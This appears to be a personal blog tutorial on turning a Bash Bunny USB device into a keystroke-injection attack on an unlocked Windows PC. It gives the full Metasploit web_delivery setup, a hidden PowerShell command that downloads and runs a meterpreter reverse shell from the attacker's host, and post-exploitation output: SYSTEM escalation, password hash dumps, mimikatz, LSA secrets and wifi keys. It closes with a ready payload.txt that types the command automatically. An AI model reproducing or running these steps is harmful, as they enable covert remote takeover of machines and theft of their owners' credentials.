legal contact
 

own a windows system with BashBunny

After above article is done, it's now time to do the cool stuff and find a practical application for the bunny.

Some usefull information about using the bunny:

Access to the USB storage can be done via: /.../
Useful bunny commands (LED, etc.) can be found at: /usr/local/bunny/bin/

For legal reasons, I will not decribe bunny actions that work even if the screen is locked. - So in all below mentioned activities, the sceen must be unlocked by it's legetemit user and his credentials.  ;-)

I've tryed a "get windows system" aproach to enumarate everything that is possible/practicable on the host the bunny is plugged in:

Just start with:

msf > use exploit/multi/script/web_delivery
msf exploit(web_delivery) > set LHOST 172.16.64.1
msf exploit(web_delivery) > set LPORT 4444
msf exploit(web_delivery) > set target 2
msf exploit(web_delivery) > set payload windows/meterpreter/reverse_tcp
msf exploit(web_delivery) > exploit
[*] Exploit running as background job.

[*] Started reverse TCP handler on 172.16.64.1:4444
[*] Using URL: http://0.0.0.0:8080/L9AmamxWK0fGU
[*] Local IP: http://172.16.64.1:8080/L9AmamxWK0fGU
[*] Server started.
[*] Run the following command on the target machine:
powershell.exe -nop -w hidden -c $D=new-object net.webclient;$D.proxy=[Net.WebRequest]::GetSystemWebProxy();$D.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $D.downloadstring('http://172.16.64.1:8080/L9AmamxWK0fGU');

Now call bellow command on the host of the bunny.
Later we'll put this into the HID attack:

powershell.exe -nop -w hidden -c $D=new-object net.webclient;$D.proxy=[Net.WebRequest]::GetSystemWebProxy();$D.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $D.downloadstring('http://172.16.64.1:8080/L9AmamxWK0fGU');

Back to the metasploit shell you will see:

[*] Sending stage (957487 bytes) to 172.16.64.64
[*] Meterpreter session 1 opened (172.16.64.1:4444 -> 172.16.64.64:65282) at 2017-06-02 11:38:36 -0700

To gain access to the shell:

msf > sessions -i 1

meterpreter > getuid

meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).

meterpreter > gutuid
Server username: NT-AUTORITÄT\SYSTEM


meterpreter > sysinfo
Computer : ENG-MPAULI
OS : Windows 7 (Build 7601, Service Pack 1).
Architecture : x64
System Language : de_DE
Domain : CCS-CDC
Logged On Users : 4
Meterpreter : x86/windows

meterpreter > run post/windows/gather/hashdump

[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 24cbb33d297c3b41128881[edited]...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hints...

mpauli:"<Password hint>"

[*] Dumping password hashes...

Administrator:500:aad3b435b51404eeaad3b435b51404ee:72f2d4be0b2[edited]:::
Gast:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73[edited]:::
mpauli:1000:aad3b435b51404eeaad3b435b51404ee:72f2d4be0b2abeec[edited]:::
SophosSAUENG-MPAULI0:1013:aad3b435b51404eeaad3b435b51404ee[edited]:::
___VMware_Conv_SA___:1033:aad3b435b51404eeaad3b435b51404ee:1d[edited]:::
postgres:1035:aad3b435b51404eeaad3b435b51404ee:72f2d4be0b2abe[edited]:::

 

meterpreter > load kiwi
Loading extension kiwi...

.#####. mimikatz 2.1.1-20170409 (x86/windows)
.## ^ ##. "A La Vie, A L'Amour"
## / \ ## /* * *
## \ / ## Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
'## v ##' http://blog.gentilkiwi.com/mimikatz (oe.eo)
'#####' Ported to Metasploit by OJ Reeves `TheColonial` * * */

[!] Loaded x86 Kiwi on an x64 architecture.

success.


meterpreter > kerberos
meterpreter > run enum_chrome -m
meterpreter > run get_application_list
[still a ToDo]

meterpreter > wifi_list

Intel(R) Dual Band Wireless-AC 8260 - {6136617b-3138-3632-382d-663837352d34}
============================================================================

Name Auth Type Shared Key
---- ---- ---- ----------
Bad!Net WPA2PSK passPhrase [edited]

meterpreter > lsa_dump_secrets
[+] Running as SYSTEM
[*] Dumping LSA secrets
Domain : [edited]
SysKey : [edited]297c3b41128881292a7f3a56

Local name : [edited] ( S-1-5-21-2998780121-3448037615-3415097299 )
Domain name : [edited] ( S-1-5-21-2371561235-1912312394-1895229363 )
Domain FQDN : [edited]

Policy subsystem is : 1.11
LSA Key(s) : 1, default {[edited]-3a7a-19ee-027f-0c4a15b67901}
[00] {[edited]-3a7a-19ee-027f-0c4a15b67901} b0a01650aa0305e9c24c7cc3ed31bbd5b78c0cc32df595c022a1004401f68368

Secret : $MACHINE.ACC
cur/hex : [edited] fb 4d 68 00 0c 3d df 75 18 59 ed 78 b3 c5 e7 de de f5 0a a1 74 b2 55 aa a0 d2 27 6f 2e 12 06 ee d1 49 a2 e1 08 c8 7b 24 8a ec 5e a7 c3 e6 a2 a4 47 3f 68 d6 9c 8c 9d 77 b8 94 49 54 45 87 32 c3 21 35 50 f3 02 d9 02 d3 07 4b eb 3d 42 ec ff 7d 1a 79 89 bd 1a 27 45 03 c7 20 2c 95 25 35 04 69 37 d0 f8 12 ed 14 85 a8 1e 4b ce 39 76 04 37 3f 60 b3 2b 47 1e 9b 22 74 eb 7c 33 86 e9 84 6f 24 f7 f2 47 f0 85 5d 34 fc 62 f7 32 fd db ac 47 b1 73 3d bf 46 a0 e1 84 d9 78 3a 89 23 92 ba 80 3e 61 8c a0 b3 ce 89 29 8f 47 f5 3b c8 3c 92 fc 39 83 39 73 35 9d d6 c3 39 69 b0 7d 71 30 fa a9 0c 7e ff 20 63 eb 0d 01 2d 8d 3e a8 cc 09 f8 4e 14 a9 75 c3 00 e4 69 39 b9 87
NTLM:[edited]200caad2e062f5e32588d4ac
SHA1:[edited]bd8f7f59a2f11908747dbcdc126ef9629
old/hex : [edited] 43 f9 64 1f 5f 0a f3 8b b8 9a 3c 34 b2 20 a1 54 c3 3c 12 e4 f4 f4 e3 54 af 9b c6 42 72 de 22 dc 28 dc f2 3f 66 78 3c da b6 0a 1a 7d 03 c4 bc 45 c4 c4 e4 d3 d8 e2 6d 11 cb c5 3e 84 7b 1c 82 38 bf 2f a4 79 56 df f8 28 c7 11 83 9c bc 2f 7a 04 72 d5 dc 24 c2 76 5f 96 80 4c 1e b1 81 96 09 e5 36 9a e1 10 77 a5 49 24 bb 41 71 3c c3 b2 78 18 91 6e 45 6b 47 97 27 19 ee ed 44 28 97 db 6e b6 8d d4 0a f1 4e 41 65 6b bc 1e 54 24 cc 0f 79 b8 ef 69 ac 3f 80 9a 99 ff 66 f1 4f 94 99 33 81 18 95 57 57 38 0b db eb 5c df e5 d5 07 e1 35 8e 1a 04 e2 3c bf 16 df d9 48 6b a2 eb 38 e3 fe c6 8e 2d 29 31 a5 5f bc a8 40 18 01 09 e4 90 b7 cc b4 b9 01 4f 5f 65 57 0f 82 6a
NTLM:[edited]7a05b9b9d5b5901ffb6b15ca
SHA1:[edited]6958ede2562a7986b48bfa5603e42291b

Using MimiKatz 2.0:

meterpreter> execute -H -i -c -m -d calc.exe -f mimikatz.exe -a '"sekurlsa::logonPasswords full" exit'

[still a ToDo]

Secret : DefaultPassword

Secret : DPAPI_SYSTEM
cur/hex : [edited]73 e7 14 24 f3 4c c8 28 4d 70 51 af 64 69 1b 2d c5 04 ae 93 55 58 91 3b cd 8f cb 53 98 41 0b 67 6f
full: [edited]ca773e71424f34cc8284d7051af64691b2dc504ae935558913bcd8fcb5398410b676f
m/u : [edited]3ca773e71424f34cc8284d7051af64 / 691b2dc504ae935558913bcd8fcb5398410b676f
old/hex : [edited] c5 4d b6 18 bb f2 36 b7 d1 32 39 74 b4 17 1c 27 ad 13 8e e6 87 ef 34 20 74 bb ed 55 95 85 27 e0 67 83 d8 3f b2 60
full: [edited]18bbf236b7d1323974b4171c27ad138ee687ef342074bbed55958527e06783d83fb260
m/u : [edited]8bbf236b7d1323974b4171c27ad13 / 8ee687ef342074bbed55958527e06783d83fb260

Secret : NL$KM
cur/hex : [edited] 76 ed 8f fb 22 e0 15 ff 41 c4 c2 d4 06 e9 06 51 d6 50 39 a9 3c 66 cc ee 98 89 ae 78 63 95 43 49 78 fa ac 31 91 56 78 b1 3e a7 c1 38 99 43 6e df 70 28 99 51 54 dc

Secret : _SC_pgAgent / service 'pgAgent' with username : .\postgres
cur/text: [edited]

rumeterpreter > run scraper
[*] New session on 172.16.64.64:6017...
[*] Gathering basic system information...
[-] Failed to run command net view
[-] Error: Rex::TimeoutError Operation timed out.
[*] Error dumping hashes: Rex::Post::Meterpreter::RequestError priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect.
[*] Obtaining the entire registry...
[*] Exporting HKCU
[*] Downloading HKCU (C:\Users\[edited]\AppData\Local\Temp\ratAKnvq.reg)
[*] Cleaning HKCU
[*] Exporting HKLM
[*] Downloading HKLM (C:\Users\[edited]\AppData\Local\Temp\USNwplss.reg)

All the scraper logs are written to /root/.msf4/logs/scripts/scraper/ and can be copied over to ....

The payload to accomplish the above

save below text as payload.txt to your switch directory

#!/bin/bash
# Set the keyboard to be german (in my case), this must correspond to the attacked machine keyboard
DUCKY_LANG us


# get the reverseshell part call your (not yet running) meterpreter
ATTACKMODE HID
LED B
Q GUI R
Q DELAY 100
Q STRING powershell.exe -nop -w hidden -c $D=new-object net.webclient;\
$D.proxy=[Net.WebRequest]::GetSystemWebProxy();\
$D.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;\
IEX $D.downloadstring('http://172.16.64.1:8080/L9AmamxWK0fGU');
Q DELAY 100
Q ENTER
# Now start spinning up the metasploit


LED STAGE1
ATTACKMODE RNDIS_ETHERNET 
#Set some current time ..... check your watch 
date -s "20170523 23:23" 
LED ATTACK 
/root/metasploit-framework/msfconsole -r /root/metasploit-framework/eternal-cmd.rc & 
LED FINISH